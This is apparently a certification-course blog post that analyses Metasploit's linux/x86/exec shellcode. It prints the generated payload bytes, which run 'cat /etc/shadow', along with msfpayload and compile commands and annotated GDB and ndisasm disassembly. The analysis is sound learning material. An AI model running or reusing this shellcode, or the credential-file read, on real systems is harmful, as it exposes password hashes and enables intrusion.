viernes, 9 de mayo de 2014

[SLAE] V-1 Analyzing Metasploit linux/x86/exec payload

Source: SecurityTube


I explain every line witch need explication, I hope it's explained enough, if you don't understand something, leave me a commend and I will explain/respond to all questions.

1) We need generate our payload for post analysis
msfpayload linux/x86/exec CMD='cat /etc/shadow' C
/*
 * linux/x86/exec - 51 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false, CMD=cat /etc/shadow
 */
unsigned char buf[] = 
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x10\x00\x00\x00\x63"
"\x61\x74\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x00"
"\x57\x53\x89\xe1\xcd\x80";

compilation - gcc -ggdb -z execstack -fno-stack-protector shellcode.c -o shellcode
source of .C code can be found here: https://github.com/doomedraven/SLAE/tree/master/SLAEx32/Assignment%205

2) Analyzing with GDB

gdb -q ./shellcode

=> 0x0804a040 <+0>:        push   0xb    ; 11 -> __NR_execve
   0x0804a042 <+2>:        pop    eax
   0x0804a043 <+3>:        cdq           ; convert double to quad
   0x0804a044 <+4>:        push   edx    ; 0
   0x0804a045 <+5>:        pushw  0x632d ; .decode('hex') -> '-c'
   0x0804a049 <+9>:        mov    edi,esp; save pointer to -c 
   0x0804a04b <+11>:       push   0x68732f  ; hs/
   0x0804a050 <+16>:       push   0x6e69622f; nib/
   0x0804a055 <+21>:       mov    ebx,esp   ; save pointer to /bin/bash
   0x0804a057 <+23>:       push   edx
   0x0804a058 <+24>:       call   0x804a06d ; jump to 0x0804a06d <+45>
   0x0804a05d <+29>:       arpl   WORD PTR [ecx+0x74],sp 
   0x0804a060 <+32>:       and    BYTE PTR [edi],ch       
   0x0804a062 <+34>:       gs                             
   0x0804a063 <+35>:       je     0x804a0c8
   0x0804a065 <+37>:       das    
   0x0804a066 <+38>:       jae    0x804a0d0
   0x0804a068 <+40>:       popa   
   0x0804a069 <+41>:       outs   dx,DWORD PTR fs:[esi]
   0x0804a06b <+43>:       ja     0x804a06d 
   0x0804a06d <+45>:       push   edi     ; jump here and push pointer to -c
   0x0804a06e <+46>:       push   ebx     ; push point to start of  /bin
   0x0804a06f <+47>:       mov    ecx,esp ; save pointer
   0x0804a071 <+49>:       int    0x80    ; syscall
   0x0804a073 <+51>:       add    BYTE PTR [eax],al
End of assembler dump.

3) Looking with Ndisasm

msfpayload -p linux/x86/exec cmd='cat /etc/shadow' R | ndisasm -
-> removed
00000018  E81000            call word 0x2b
0000001B  0000              add [bx+si],al
0000001D  636174            arpl [bx+di+0x74],sp ;cat
00000020  202F              and [bx],ch          ; /
00000022  657463            gs jz 0x88           ;etc
00000025  2F                das                  ;/
00000026  7368              jnc 0x90             ;sh
00000028  61                popaw                ;a
00000029  646F              fs outsw             ;do
0000002B  7700              ja 0x2d              ;w0
-> removed

4) Generating .dot graph with Libemu

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:


No hay comentarios:

Publicar un comentario